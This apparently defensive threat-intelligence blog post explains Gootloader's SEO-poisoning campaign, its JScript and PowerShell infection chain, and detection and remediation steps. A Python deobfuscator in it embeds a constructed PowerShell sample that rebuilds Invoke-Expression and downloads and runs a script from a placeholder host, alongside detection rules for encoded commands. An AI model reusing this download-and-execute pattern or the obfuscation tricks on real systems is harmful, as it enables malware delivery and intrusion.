BIPI

Gootloader SEO Poisoning: Search Your Way Into a Breach

Threat Intelligence

Gootloader hijacks search engine results to serve malware disguised as legal templates and business documents. The attack requires no phishing email: the victim comes to the attacker.

By Arjun Raghavan, Security & Systems Lead, BIPI · September 6, 2024 · 8 min read

#gootloader #seo-poisoning #malware #initial-access #powershell

Most malware delivery requires the attacker to push something at the victim: an email, a text, a pop-up. Gootloader inverts this model. The group, tracked as UNC2565 or Hive0127, compromises legitimate high-ranking websites and stuffs them with hidden forum posts optimized for search queries that professionals make: employment contracts, non-disclosure agreements, financial templates, licensing forms. The victim searches, clicks a top result, and downloads what looks like the document they wanted.

SEO Poisoning Mechanics

Gootloader operators compromise WordPress sites with significant domain authority, often ones running outdated plugins. They inject hidden pages, invisible to normal visitors, that contain thousands of keyword-stuffed forum threads. Each thread presents a fake discussion where a 'user' has asked for a specific document template and another 'user' has provided a download link. The link resolves to a .zip file served from the same compromised site.

  • Targets: WordPress sites with domain authority above 40, typically in law, finance, HR, and government sectors
  • Injection: hidden div elements or alternate URL paths not linked from the main navigation
  • Search optimization: each fake thread targets a specific long-tail keyword like 'california non-compete agreement template 2024'
  • Scale: researchers have documented over 400 compromised sites active simultaneously during peak Gootloader campaigns

Payload Delivery

The downloaded .zip contains a single .js (JScript) file whose name matches the search query. On Windows, double-clicking a .js file executes it with wscript.exe. The JScript is heavily obfuscated and contains the entire Gootloader stage-one payload inline: it writes a scheduled task, drops a PowerShell script to disk, and initiates the second-stage fetch. The obfuscation combines string concatenation, eval calls, and variable-name randomization that changes per victim to defeat static signatures.

  1. Victim searches for a business document template and clicks a top Google result
  2. Landing page is a fake forum thread with a .zip download link
  3. Victim downloads .zip, extracts, and double-clicks the .js file
  4. wscript.exe executes the JScript loader; no UAC prompt, no macro warning
  5. JScript creates a scheduled task set to run at logon, drops an obfuscated PowerShell script
  6. PowerShell script fetches and decodes second-stage payload (GootKit RAT, Cobalt Strike, or REvil)
  7. Operator accesses the host via Cobalt Strike; lateral movement begins within hours

Gootloader is unusual because the victim is the one initiating contact. There is no suspicious email to block. The attack surface is the user's browser and their professional need for a document.

PowerShell Execution Chain

The PowerShell script dropped by Gootloader uses a multi-layer encoding strategy. The outer layer is a base64-encoded string that, when decoded, produces a second PowerShell command using string format operators to reconstruct keywords that AV would flag. The innermost layer downloads a payload from a C2 URL constructed dynamically at runtime from fragments stored in separate variables. This fragmentation defeats static URL extraction from memory dumps.
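To show how the three layers described above peel apart in practice, here is an added Python decoder written for this article (not Gootloader code and not a BIPI tool), run over a constructed sample; the inner script text and the domain c2-placeholder.invalid are made up, and the real loader's variable names and layout will differ.

```python
import base64
import re

# Constructed sample, not a real Gootloader artefact: an inner command that
# hides Invoke-Expression behind a -f format operator and builds its URL
# from fragments, stored UTF-16LE + base64 the way -EncodedCommand expects.
INNER = (
    "$a='https://'; $b='c2-placeholder.invalid'; $c='/stage2.txt'; "
    "$u=$a+$b+$c; "
    "& ('{1}{0}' -f 'pression','Invoke-Ex') ((New-Object Net.WebClient).DownloadString($u))"
)
ENCODED = base64.b64encode(INNER.encode("utf-16-le")).decode("ascii")
SAMPLE = f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"

FORMAT_RE = re.compile(r"\(\s*'((?:\{\d+\})+)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
CONCAT_RE = re.compile(r"\$\w+(?:\s*\+\s*\$\w+)+")
URL_RE = re.compile(r"https?://[^\s'\";)]+")

def decode_outer(cmdline):
    """Layer 1: pull the -EncodedCommand argument and undo base64 + UTF-16LE."""
    m = re.search(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def resolve_format_ops(script):
    """Layer 2: rebuild keywords hidden behind ('{1}{0}' -f 'b','a')."""
    def _sub(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        try:
            return "'" + m.group(1).format(*args) + "'"  # PS and Python share {n}
        except IndexError:
            return m.group(0)  # malformed operator: leave it for the analyst
    return FORMAT_RE.sub(_sub, script)

def resolve_fragments(script):
    """Layer 3: join URL fragments held in separate variables ($a+$b+$c)."""
    literals = dict(ASSIGN_RE.findall(script))
    def _join(m):
        names = re.findall(r"\$(\w+)", m.group(0))
        if all(n in literals for n in names):
            return "'" + "".join(literals[n] for n in names) + "'"
        return m.group(0)  # chain uses a non-literal variable; keep as-is
    return CONCAT_RE.sub(_join, script)

def deobfuscate(cmdline):
    """Peel all three layers; return (readable script, URLs found in it)."""
    inner = decode_outer(cmdline)
    if inner is None:
        return None, []
    clean = resolve_fragments(resolve_format_ops(inner))
    return clean, URL_RE.findall(clean)
```

The static pass recovers the URL only because every fragment is a string literal; when a fragment is computed at runtime the chain is left untouched and a sandbox run with Script Block Logging is the fallback.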

Lateral Movement Patterns

  • Cobalt Strike beacon deployed within 1-3 hours of initial compromise
  • BloodHound/SharpHound executed to enumerate Active Directory
  • Credential dumping via Mimikatz or direct LSASS memory reading
  • Ransomware deployment (historically REvil, more recently INC Ransom and Agenda): typically 24-72 hours post-access
  • Operators are known to exfiltrate data before encryption for double-extortion

  • 400+: compromised sites used simultaneously at peak
  • 0: phishing emails required; the victim searches voluntarily
  • ~2 hours: mean time to Cobalt Strike after initial .js execution
  • 5 years: Gootloader campaign duration (2019 to present)

Detection

  • Alert on wscript.exe or cscript.exe executing .js files from user Downloads or Desktop directories
  • SIGMA: wscript.exe spawning cmd.exe or powershell.exe, especially with encoded command arguments
  • Scheduled task creation by wscript.exe or cscript.exe is highly anomalous and should alert immediately
  • PowerShell launched with the -EncodedCommand flag, followed by outbound HTTPS to a non-corporate domain
  • DNS: Gootloader C2 domains tend to be newly registered (under 90 days) with high-entropy hostnames
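The first four host-based rules above, expressed as an added Python triage function written for this article (not a BIPI detection and not a vendor rule), run over constructed Sysmon-style process-creation events; the paths, user name and task name are invented, the base64 argument is a placeholder, and the network correlation in the fourth rule is left to the SIEM.

```python
import re

# Constructed process-creation events (image, parent image, command line).
# None of these come from a real incident; "QQBCAEMA" is just "ABC" in UTF-16LE.
EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\nda template 2024.js"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'schtasks.exe /create /tn "UpdateTask" /sc onlogon /tr "powershell.exe -w hidden"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell.exe -NoP -W Hidden -EncodedCommand QQBCAEMA"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign admin use
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
USER_DIRS = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop)\\", re.I)
JS_ARG = re.compile(r"\.jse?\"?\s*$", re.I)          # last argument is a .js/.jse file
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)  # common -EncodedCommand spellings

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(ev):
    """Return (rule, severity) hits for one event; an empty list means no rule fired."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    hits = []
    if img in SCRIPT_HOSTS and JS_ARG.search(cmd) and USER_DIRS.search(cmd):
        hits.append(("script_host_runs_js_from_user_dir", "medium"))
    if parent in SCRIPT_HOSTS and img in SHELLS:
        # a script host spawning a shell is already bad; encoded args make it worse
        hits.append(("script_host_spawns_shell", "critical" if ENCODED.search(cmd) else "high"))
    if parent in SCRIPT_HOSTS and img == "schtasks.exe" and "/create" in cmd.lower():
        hits.append(("script_host_creates_scheduled_task", "critical"))
    if img in ("powershell.exe", "pwsh.exe") and ENCODED.search(cmd):
        hits.append(("powershell_encoded_command", "medium"))  # correlate with egress in the SIEM
    return hits

def triage(events):
    """Map each event index to its hits so the analyst sees the chain in order."""
    return {i: evaluate(ev) for i, ev in enumerate(events)}
```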

Remediation

  1. Reassign .js and .jse file handlers to notepad.exe via GPO: HKLM\SOFTWARE\Classes\JSFile\shell\open\command
  2. Enable PowerShell Script Block Logging and Transcription logging via GPO
  3. Block outbound connections from wscript.exe and cscript.exe at the host firewall or via AppLocker
  4. Add web proxy category blocking for newly registered domains (Umbrella, Zscaler, Bluecoat all support this)
  5. If Gootloader execution is confirmed, treat as pre-ransomware and initiate IR playbook immediately
